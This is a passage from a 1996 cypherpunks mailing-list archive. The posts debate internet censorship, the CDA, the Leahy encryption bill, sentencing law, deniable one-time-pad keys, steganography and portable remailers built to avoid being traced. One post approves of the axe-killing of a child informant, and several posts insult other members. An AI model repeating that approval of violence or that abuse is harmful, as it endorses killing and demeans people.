not reveal to Alice that he was the one who sent the note.
Back to the drawing board.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Mar 1996 19:30:14 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <199603080907.BAA23787@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 3/7/96 -0800, the TimWatch service posted:

>Opinions are opinions, and a free society has no business suppressing
>opinions by use of torts. (Another related area is the use of torts to halt
>public comment on controversial development plans. These are called "SLAPP"
>suits--"Strategic Lawsuits Against Public Participation." For example,
>where AT&T sues "the Cypherpunks" to shut them up about their anti-Clipper
>feelings. Some judges are awarding large damages to the groups hit with the
>SLAPP suits.)

Hey, give The Big Phone Company a break - they did just stop pushing
Lotus Notes (I don't remember if they were providing the latest
espionage-enabled verstion or just the one previous to it.)
Of course, their decision wasn't based on Lotus's selection of GAK;
it was more related to their success in selling this high-mainenance service,
which may also be related to Lotus's decision to try to increase their
foreign market......

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 9 Mar 1996 19:39:15 +0800
To: cypherpunks@toad.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <ad653256040210047f82@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:11 AM 3/8/96, Bill Frantz wrote:

>I agree fully so far.  However, when your TimWatch software takes action
>based on your opinions, you may have crossed the line between speech and
>action.  Since you made the decision, rather than just provided an opinion,
>you might, in our current legal climate, have caused a tort.

So, when someone downloads the Siskel and Ebert list of thumbs up/thumbs
down ratings, and then "lets the software decide" which movies to see, a
tort has possibly occurred?

I don't buy it. SurfWatch is just a ratings service. They aren't coercing
people to use it.

>It would be interesting to see if a HIV positive teen could sue SurfWatch
>because it blocked him from getting information on safe sex.

Presumably the owners of the machine he is using--maybe his parents, maybe
his Catholic school, maybe his company--installed the SurfWatch or similar
program and programmed the ratings. The teen should look to them.

(Not that matters, but I really dislike using AIDS education as an example.
Any person who claims to not know about AIDS prevention probably is either
uneducable or doesn't want to know. A Web site isn't going to make a
difference. I'm not arguing for censorship, nor would I ever install
SurfWatch in my home, just saying that the hype about AIDS education is a
hot button being used by arguers of all stripes to push their policy
agendas. More heat than light.)


>IMO our society has tilted too far away from caveat emptor toward "it's
>someone else's fault".  People who let a machine censor their data deserve
>what they get.  Parents who consistantly hide reality from their children,
>instead of helping them learn how to deal with it, are crippling their
>children.

Well, they're my children to educate as I see fit. I view religions as more
crippling than denying a child access to "The Gay Men's Safe Sex Site,"
but, fortunately, I cannot interfere with the upbringings others give their
children.

We may dislike the "programming choices" that the current instance of
SurfWatch provides, but the solution is _competing_ ratings services, not
talk of suing SurfWatch on the basis that it creates a tort, or denies
children access to proper exposure to Gay Sex Lifestyles.

Let a thousand ratings systems, including the No Rating System, bloom.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 8 Mar 1996 18:17:18 +0800
Subject: No Subject
Message-ID: <199603080728.CAA23535@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


d 96-03-07 20:19:12 EST, you write:

>Because the drive is portable. You can place an easily concealled two-pound
>135 Mb drive in a briefcase or backpack and have a travelling MixMaster
>site. Here today, there tomorrow, someplace else the next day. Makes the
>whole system a real problem for the security types to track down. 
> 

Why not just put an IDE/SCSI EZ drive in a Pentium laptop with an ISDN or
28.8K modem?  That would be the ultimate in portability; you could still hide
the whole thing, or remove the cartridge and destroy it fairly quickly if
necessary.  That would give you the best of all worlds.

However, no matter where you are physically located, you have to have an
account with somebody somewhere to get Internet access.  If the gov't wants
you out of business, they can cancel your ISP account or revoke your domain
name and shut you down that way.  I suppose it would be harder for them to
prosecute you if they didn't know where you were, though...

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Fri, 8 Mar 1996 18:17:29 +0800
To: tj_lists@prado.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603080737.CAA10760@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


tj_lists@prado.com wrote:

> Couldn't help noticing this, presume you mean Federal Judges since the
> waiver would be from aspects of GCA 1968, a Federal law. The fact is, at
> least in sentencing, Federal Judges now have very little discretion. The
> Federal Sentencing Guideline structure established in the 1980's provides
> "guidelines" for a given defendant convicted of a given set of charges. Things

That aside, in running trials and in many other little things both 
federal and non-federal judges have too much leeway in deciding what 
evidence can be admitted, in some of the sentencing details and in 
various forms of punishment and restitution, etc.

But yes, you made a good reminder point about mandatory sentencing.

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sat, 9 Mar 1996 19:33:27 +0800
To: coderpunks@toad.com
Subject: ANNOUNCE: NOISE.SYS v0.4.9-Beta /dev/random driver for DOS syste
Message-ID: <199603080838.DAA11325@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



The latest version of NOISE.SYS (0.4.9) should be available "real 
soon now" at ftp.elf.stuba.sk in the ??/security directory [I don't 
remember the exact path...].

It should also be available at the ftp.wimsey.com and ftp.funet.fi 
sites soon.

NOISE.SYS is a /dev/random driver for DOS systems, similar to the 
random.c implementation for Linux and FreeBSD.  It sets up two 
devices, "random" and "urandom" which return streams of crypto- 
quality random bytes based on fast timings from the keyboard IRQ, 
disk access, Windows 3.x message broadcasts, mouse movement, and cpu 
clock drift, with some experimental kluges to sample the audio card 
input [to be improved in future versions].  The raw samples are mixed 
using a polynomial function and then hashed using SHA-1.  Entropy 
estimation is based on arithmetic coding schemes and how often 
samples recur, rather than on the sample deltas themselves.

The source is included (in 386 assembler) and is relatively easy to 
modify and experiment with [plenty of comments and macros].




Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 8 Mar 1996 19:13:00 +0800
To: cypherpunks@toad.com
Subject: U.S. State Dept criticizes Chinese net-censorship
Message-ID: <QlDzANm00YUsFE3=hQ@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The U.S. State Department's Human Rights Report for 1995 talks about 
restrictions on new media in China, pointing out that Internet access is 
now limited.

How ironic that the U.S. Government would report that "government limits
on Internet access" will harm the medium's growth -- while our _own_
government is imposing similarly suffocating regulations domestically. 

I draw small comfort from the fact that, as censors, we're not quite as
accomplished as those in China or Zambia: 
   http://www.cs.cmu.edu/~declan/zambia/
   http://fight-censorship.dementia.org/top/

-Declan

----

U.S. State Department Human Rights Report
gopher://dosfan.lib.uic.edu/0F-1%3A23308%3AChina

 In many respects, Chinese society continued to open up:  greater
 disposable income, looser ideological controls, and freer access to
 outside sources of information have led to greater room for individual
 choice, more diversity in cultural life, and increased media reporting. 
 Although the sale and use of satellite dishes are tightly regulated,
 satellite television broadcasts are widely available, particularly in  
 coastal areas.  Telephone and facsimile communication is also           
 extensively used.  In many cities, the introduction of commercial
 Internet service promoted access to international sources of             
 information.  At year's end, however, new government limits on Internet
 access threatened to halt the growth of Internet use.  In addition, new
 controls on reporting economic information introduced doubts about the
 Government's commitment to freedom of information.  Government control  
 of news media generally continues to depend on self-censorship to       
 regulate political and social content, but the authorities also         
 consistently penalize those who exceed the permissable. 

###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tj_lists@prado.com
Date: Fri, 8 Mar 1996 19:54:50 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guidelines)
Message-ID: <199603080947.BAA21810@zoe.prado.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Deranged Mutant <WlkngOwl@UNiX.asb.com> 03/07/96  7:06pm +0000 
 
> Yes and no. Depends on the judge.  Some are hard-assed about granting   
> waivers, others aren't.  Part of the problerm is that judges have too   
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^          
> much discretion. 
^^^^^^^^^^^^^^^^^ 
 
Couldn't help noticing this, presume you mean Federal Judges since the 
waiver would be from aspects of GCA 1968, a Federal law. The fact is, at 
least in sentencing, Federal Judges now have very little discretion. The 
Federal Sentencing Guideline structure established in the 1980's provides 
"guidelines" for a given defendant convicted of a given set of charges. Things 
like prior offenses add "points", ratting on your friends takes away "points". 
In this case less is better than more. Anyway, a low level bureaucrat fills 
out a presentence investigation report on the basis of complicated, arcane 
rules it is easy to get wrong. This report goes to the judge who can pass 
sentence only within a narrow range, say 6 months 1 way or the other on a 
5 year sentence (very few new Federal "crimes" carry less than this). Any 
departure from this range, either upward or downward, must be justified in a 
formal opinion, & can be appealed by either party. Very few judges bother. 
This system is cookie cutter in-justice at it's finest, & only a lack of 
bureaucratic imagination has prevented it from being computerized beyond the 
use of word processors to write the report. 
 
Since well over 90% of Federal Criminal cases end in guilty pleas, this method 
has the effect of transferring discretion that formerly belonged to the judge to 
the prosecutor, who gets to pick from a variety of charges covering the same offense, 
and the low level flunkey who gets to fill out the forms. This is exactly the big   
problem with the new "crime" of using encryption in a felony in the Leahy bill.   
Assuming for a moment this new law is tailored very narrowly & is only used on people   
who 
1. Commit without governmental entrapment an underlying felony. 
2. Exclusively use encrypted traffic in direct furtherance of the underlying felony, 
(example: murder for hire is negotiated via encrypted messages) 
there still remains the fact that this is simply another tool of prosecutorial   
discretion, of which there is way to much already. The problem with prosecutorial   
discretion is that it is always used to encourage snitching, turning this country 
into a nation of Pavel Mozorov's (12 year old Hero of the Soviet Union who ratted out   
his parents to the Cheka for concealing a pig from collectivization. His uncles did as   
should be done in such cases & cut him up with an axe). 
 
However, I do agree that in setting conditions other than fines & prison time, Federal   
Judges do have too much discretion. Chris Lambert (mthreat, Minor Threat) a 21 year old 
Austin cracker now doing time in Bastrop FCI, as part of his sentence is forbidden to   
own or work with any computer w/ modem or network card/connection. This of course is to   
apply after he gets out. Traditionally, counterfeiters, who come from the ranks of   
printers, merely have to report to their parole officer & get his ok in order to own or   
go to work for a print shop.     
 
  



cc: cypherpunks@toad.com
    mthreat@paranoia.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 9 Mar 1996 19:39:08 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <ad654abd050210043b58@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:32 AM 3/8/96, Deranged Mutant wrote:

>That aside, in running trials and in many other little things both
>federal and non-federal judges have too much leeway in deciding what
>evidence can be admitted, in some of the sentencing details and in
>various forms of punishment and restitution, etc.
>
>But yes, you made a good reminder point about mandatory sentencing.

I saw a report on CNN Thursday that a new study (done by some law industry
body, I didn't note which) indicated that California's "Three Strikes and
You're Out" sentencing law is having this effect:

85% of all of the felons sent away for 25-years-to-life were sent away in
cases where there 3rd strike was for a drug deal, petty theft, etc. One guy
featured had never committed any violent acts, and his 3rd strike was for
lifing a pizza.

Now I am generally for harsh punishment for true crimes (murder, rape, and
even robbery), but many of the "felonies" are not in this class. Many are
drug-related (you all have heard the many horror stories about 19-year-old
Deadheads sentenced to 15 years for having blotter acid at Dead concerts).

The relevance to this list, and to the CDA? The felonies the CDA defines
are just that: felonies. Not misdemeanors. While sentencing guidelines have
not been issued--a point Brian Davis reminded me of in a private
communication--it is likely under California law that these felonies will
count toward the "Three Strikes" sentencing.

These fuckers in Congress are full of shit. There, I could be prosecuted
under the CDA for "manifestly indecent" language, made available to minors
(several high school students have identified themselves as being on the
list, so it is highly likely minors are on the list at any given time).
It's unlikely that mere indecent language would ever be prosecuted, but the
CDA says it can be.

I'd better not fuck up a third time....whoops. Oh shit.

"25-years-to-life." Welcome once again to Amerika.


--Tim May, a felon


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 9 Mar 1996 19:27:52 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: ANTI-CRYPTO CYPHERPUNKS
Message-ID: <960308040202_240667145@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-08 01:37:10 EST, you write:

>Subj:	ANTI-CRYPTO CYPHERPUNKS
>Date:	96-03-08 01:37:10 EST
>From:	anonymous-remailer@shell.portal.com
>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>
>This is the first in a regular series of postings of cypherpunks
>who have joined big brothers fight to deprive you from Unescrowed
>Crypto. Some of these pigs have come out in favor of the new anticrypto
>bill which makes it a crime to use crypto if big bro can't read it
>and also sets up key escrow but others have just said that they
>don't care if the government can read YOUR mail as long as they get
>what they want.

I see the mentally impaired, chicken crap eating buttwipe that wrote this
drivel wasn't even brave enough to post his real email address.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 9 Mar 1996 19:36:15 +0800
To: vznuri@netcom.com
Subject: Re: steganographic trick
Message-ID: <960308040205_240667097@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-07 23:02:48 EST, vznuri@netcom.com writes:

>imagine an application where you freely admit that you have your
>cryptographic tools, and that you are even willing to tell the
>"feds" the key for your data. they run the crypto program, and
>indeed the file decrypts. however, unknown to them, you have given
>them a key that decrypts the file into something meaningful yet
>benign, such as a cookie recipe, not
>your plans for the overthrow of the state. in other words, 
>"interlaced" or "coincident" within the same file is your secret
>data. given one key, it decrypts into one set of data, and given
>another key, it decrypts into another set of data.

The only computationally feasible way to accomplish this would be to use a
variation of the one time pad (OTP) cipher, and use two keys:  the genuine
key, which is made by the random number generator of your choice, and a
specially cooked key generated by XORing the encrypted message with an
innocuous message.  Decrypting with the random key will yield the real
message, and decrypting with the cooked key will yield the innocuous message.
 The disadvantage to this system is that each key will be the same length as
the message.

The method you propose (using multiple RSA keys) is not workable.  Finding 2
RSA keys that will decrypt a given ciphertext block to any 2 meaningful
plaintexts is at least as difficult as breaking RSA, and expanding this
concept to messages longer than 1 block moves it into the realm of
impossibility.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 9 Mar 1996 19:42:02 +0800
To: mccoy@communities.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
Message-ID: <960308043046_240672475@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-08 03:39:00 EST, you write:

>     -It can be applied by two routers which are in the middle
>         of the connection.  The two endpoints of the TCP/IP
>         connection would not even notice.  For example, if I control
>         a router "upstream" of a major connection point and the
>         site I wish to communicate with is in a similar position
>         then I can run the subliminal channel in a "spread spectrum"
>         mode across many connections and the packets can get reset
>         to their original settings by the other site. The user
>         whose stream we fiddled with does not even know that they
>         were used as carrier wave...

You seem to be oblivious to the fact that this technique is only useful for
ISP's, corporate networks, etc. that the average home computer user will
never have access to.  If I want to send a WAV file of my 2 year old son
saying "Hi, gramma" (or a 24-bit color TIFF of him practicing nose-picking
techniques) to my relatives, that is not overtly suspicious behavior, even if
it has a slight amount of background noise (or graininess).  As long as I
don't stego too many bits in the file, and I strip out any overt "I'm crypto"
headers, it will be impossible to prove that stego techniques were used on a
file.  Finding random bits where random bits normally live cannot be used to
prove anything.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Sat, 9 Mar 1996 19:37:04 +0800
To: cypherpunks@toad.com
Subject: U.S. State Dept criticizes Chinese net-censorship
Message-ID: <199603081049.FAA26387@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> The U.S. State Department's Human Rights Report for 1995 talks about
> restrictions on new media in China, pointing out that Internet access is
> now limited.

But will they have the balls to criticise singapore?

	SINGAPORE CRACKS DOWN ON INTERNET

	The Singapore government has informed Internet content and access providers
	that it will hold them responsible for voluntarily restricting pornographic
	and politically objectionable material in transmissions to the country's
	100,000 Internet accounts.  The Singapore Broadcasting Authority is charged
	with enforcing the ban on materials that could "undermine public morals,
	political stability or religious harmony."  Most content providers will be
	deemed "licensed" unless they violate the restrictions, but political and
	religious groups must register their online intentions with the SBA.
	Punishments for transgressions have not yet been determined.  (Wall Street
	Journal 6 Mar 96 B6)


Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUAQwioZzwIn1bdtAQHYrgF/ZsQe3y/aeQCoouoOJ7SnXSY4uVOkv3eP
zPFB9+GjLuQ8xBDEzygjB5FnPkTcVnGI
=nIgN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Fri, 8 Mar 1996 16:40:49 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Leahy bill nightmare scenario?
In-Reply-To: <m0tuU2R-00095SC@pacifier.com>
Message-ID: <313fceb9.6819979@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 06 Mar 1996 16:59:36 -0800, you wrote:

>At that point, Bob is GUILTY of violation of the Leahy bill, because his=20
>encrypted anonymous remailer:
>
>1.  Uses encryption to thwart message tracing, and thus the "criminal=20
>investigation."
>
>2.  Bob has already been informed that his system will be used for illegal=
>=20
>purposes; the cops have the messages to prove he has been told.  He's GUILTY=
>=20
>GUILTY GUILTY, he will definitely lose the system and possibly whatever=20
>residence it runs in, and will probably have to pay a huge fine to boot.=20

This is not my understanding.  I believe that Bob has to be commiting
a felony himself before they can get him under the current phrasing.



Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asesor de seguridad <romina@canaa.usma.ac.pa>
Date: Fri, 8 Mar 1996 22:52:48 +0800
To: cypherpunks@toad.com
Subject: Restricted Bourne Shell
Message-ID: <Pine.3.89.9603080752.A3319-0100000@canaa.usma.ac.pa>
MIME-Version: 1.0
Content-Type: text/plain



	In AIX exist a Rsh (Restricted Bourne Shell), that mean you can 
not go out of your account, or you can not be around and see everything 
in the server.   Does anyone know's about in LINUX, or something that 
could restrict a user???...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 8 Mar 1996 23:24:30 +0800
To: JonWienke@aol.com
Subject: Re: No Subject
Message-ID: <199603081404.JAA26883@pipe12.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 08, 1996 02:28:22, 'JonWienke@aol.com' wrote: 
 
 
>d 96-03-07 20:19:12 EST, you write: 
> 
>>Because the drive is portable. You can place an easily concealled
two-pound 
>>135 Mb drive in a briefcase or backpack and have a travelling MixMaster 
>>site. Here today, there tomorrow, someplace else the next day. Makes the 
>>whole system a real problem for the security types to track down.  
>>  
> 
>Why not just put an IDE/SCSI EZ drive in a Pentium laptop with an ISDN or 
>28.8K modem?  That would be the ultimate in portability; you could still
hide 
>the whole thing, or remove the cartridge and destroy it fairly quickly if 
>necessary.  That would give you the best of all worlds. 
> 
 
Indeed this would be a technologically superior system. The system I'm
thinking of, however, has a capital startup cost of under $250. 
 
>However, no matter where you are physically located, you have to have an 
>account with somebody somewhere to get Internet access.  If the gov't
wants 
>you out of business, they can cancel your ISP account or revoke your
domain 
>name and shut you down that way.  I suppose it would be harder for them to

>prosecute you if they didn't know where you were, though... 
> 
 
I am not entirely sure how the whole domian name etc. issue will be handled
as numbered accounts fill up. I am also discussing with friends the idea of
the no-domain-name style, similar to penet.fi with various forms of REQUEST
REMAILING TO.... 
 
In other words, this or that person acts as a (perhaps temporary) remailer
from their regular account, gets the material encrypted, and massages it in
various ways before sending it out. The point is to increase entropy by
creating the technological base for an enormous proliferation of
remailer/anon tech at the lowest possible price. 
 
Internationally know "elite" (in the good sense of the word) remailers are
by definition known, and thus easy to monitor. Mixmaster etc sites popping
up from the home computers in the rec rooms of suburbia are not. 
 
--tallpaul 
 
 
>Jonathan Wienke 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 8 Mar 1996 23:04:26 +0800
To: cypherpunks@toad.com
Subject: Quotations
Message-ID: <960308091758.202098c7@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Bell posted:
>Note to the rest of you:  Observe how Mr. Peterson carefully avoids quoting 
>any material that was contained in my notes to him.  This makes his failure 
>to respond to my points less clear.  This is entirely intentional on his part.

The reason I avoided references is that the E-Mail in question was sent off 
line to him personally. Fortunately I do not expect others to respect that 
so avoid saying anything that cannot be made public. However in such cases 
I do not feel any need to requote everything I am responding to.

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 9 Mar 1996 03:24:21 +0800
To: djw@vplus.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <m0tv5t1-00093VC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:14 AM 3/8/96 GMT, Dan Weinstein wrote:
>On Wed, 06 Mar 1996 16:59:36 -0800, you wrote:
>
>>At that point, Bob is GUILTY of violation of the Leahy bill, because his
>>encrypted anonymous remailer:
>>
>>1.  Uses encryption to thwart message tracing, and thus the "criminal
>>investigation."
>>
>>2.  Bob has already been informed that his system will be used for illegal
>>purposes; the cops have the messages to prove he has been told.  He's GUILTY
>>GUILTY GUILTY, he will definitely lose the system and possibly whatever
>>residence it runs in, and will probably have to pay a huge fine to boot.
>
>This is not my understanding.  I believe that Bob has to be commiting
>a felony himself before they can get him under the current phrasing.

Well, first, the section's phrasing is screwed up.  Whether this is the 
fault of VTW, who posted the text, or the original bill I do not know.  
Second, if what they're charging is the hindrance of an felony 
investigation, it isn't clear to me why they would be limiting the charging 
of that "crime" to only those actually who have committed a felony. (logic 
isn't the normal mode of thought for a government employee, you realize.)  

 Third, all they have to do is to "suspect" the person of a felony, and a 
"felony investigation" starts.  That would presumably make him guilty of the 
Leahy bill's provision, regardless of whether he is actually participating 
in the crime supposedly being investigated.

Fourth, I gave what I considered to be a clear example of the hypothetical 
misuse of an 
encrypted remailer by the cops, one that would arguably make the remailer 
operator guilty of some "reasonable" anti-kiddie-porn statute.  At that 
point, _he_is_ the target of the investigation.  Unless you can show that 
this kind of action by the government is impossible, I consider it to be not 
merely possible but almost certain to occur.

Fifth, it isn't clear what amount of knowledge is necessary to "trigger" 
this clause, especially in its current flawed state.  Since ISP's and 
encrypted remailers might know, in general, that their systems can and 
probably are being used for SOME criminal activity, even if they can't 
identify it or the user, or decrypt it, etc, a broad interpretation of the 
resulting law could easily de-facto prohibit any business practices (i.e., 
allowing users to use encryption) that prevents full-scale monitoring and/or 
tracing.

This is only the beginning of the problems with this section.  If you can 
explain why nothing I've described could possibly occur, I welcome a 
contrary explanation.  

But I would also ask this:  Why, exactly, do we need this section?  We've 
already been told that the opponents of this bill will fight it 
tooth-and-nail under its current wording; if that's the case then the 
presence of this section is inadequate to appease their unhappiness.  
Therefore, we shouldn't include it in the bill at all; it does no good.

Any explanations, Dan?

BTW, I'm not the source of those recent anonymous notes on Cypherpunks 
criticizing you for the support of this bill.  As you by now have guessed, 
I'm not at all reticent about standing up and being counted and identified.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUBjH/qHVDBboB2dAQEeEAQAm5V7jTZWZo1MIIaL1WlQjQHdSlAOCMNJ
7j7tfpH6peWM23T7iGhZT3AckqPYwLxV8u6N96SFxaQDJ+IiCRyBRO+5qxr6sxXk
A9BCkmRxzorsqeViyIVev9lzMcljtTiZmTQ7KIAToSZD4+12xQgROLZRYtf1/tlv
E7ypJHLtsFM=
=2MNi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 9 Mar 1996 03:43:27 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Quotations
Message-ID: <m0tv5t9-00093aC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:17 AM 3/8/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Mr. Bell posted:
>>Note to the rest of you:  Observe how Mr. Peterson carefully avoids quoting 
>>any material that was contained in my notes to him.  This makes his failure 
>>to respond to my points less clear.  This is entirely intentional on his part.
>
>The reason I avoided references is that the E-Mail in question was sent off 
>line to him personally.

1.  Peterson admits he "avoided" references.

2.  The "reason" he gave (that the material was sent to me personally) does 
not justify or even explain his failing to quote my material and respond to 
it.  He could have just as easily sent me email that contained responses to 
all of my comments, had he chosen to do so.


> Fortunately I do not expect others to respect that 
>so avoid saying anything that cannot be made public.

I do not "respect" sleazy people, and especially sleazy people who are 
trying to evade the issues and their failure to be able to address the 
matters under discussion by hiding it in email.  I refuse to assist others 
in hiding their dishonesty by such a tactic.  Since the matter started out 
as a public discussion, I chose to keep it public and still choose this.

> However in such cases 
>I do not feel any need to requote everything I am responding to.

Except that your failure to quote that material was clearly intended to 
disguise the fact that you had no satisfactory response (even by your own 
standards!) to my commentary.  This is typical of you.

Jim Bell
jimbell@pacifier.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUBtIPqHVDBboB2dAQFZoQP6AjnijC6gNXWewtrRs3PMYLQn/nUQSQ31
vEQcQMVd+M0siyiv9DdARNGM/Vt6vfxuEIRrfZFw3uUTjLJvjHi7MxsD8BEGUbCZ
z1+6OA8y3ei7yJ7h3zL7lFi+0m76lA0Njp3HSscRXPkNPAGJR7WnMlJcl6ELsDv5
WZygZS8ivlo=
=JTFh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 9 Mar 1996 06:00:38 +0800
To: stewarts@ix.netcom.com
Subject: Re: Looking for code to run an encrypted mailing list
In-Reply-To: <199603060542.VAA28896@ix9.ix.netcom.com>
Message-ID: <baHQx8m9LwlQ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199603060542.VAA28896@ix9.ix.netcom.com>,
Bill Stewart <stewarts@ix.netcom.com> wrote:

> On the other hand, it really only costs you one IDEA encryption if you
> want to use the multiple-recipients options to PGP.  With the current PGP,
> this means you don't have to hack your own crypto code; the toolkits in PGP 3.0
> will make that easier, though.

True, and reasonable.

Suppose, though, that the Cypherpunks list was encrypted in this way.
There are about a thousand listmembers.  Using one IDEA key and the
multiple-recipients option would mean that the encrypted message would
consist of a thousand RSA-encrypted session keys followed by the
IDEA-encrypted cyphertext.  If everyone used a 1024-bit-or-longer key
pair, then each message would be a megabyte long!

( (m**P) mod n is going to be log2(n) bits long, right?)

BTW, it was pointed out to me in private email that while vanilla RSA
commutes, the PKCS-compliant RSA in PGP which pads the session key with
random data does not, so that my nifty trick to never expose cleartext
in the list processor wouldn't work.  That's why I'm just a loudmouth
blowhard and not a real cryptographer. ;-) 


- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

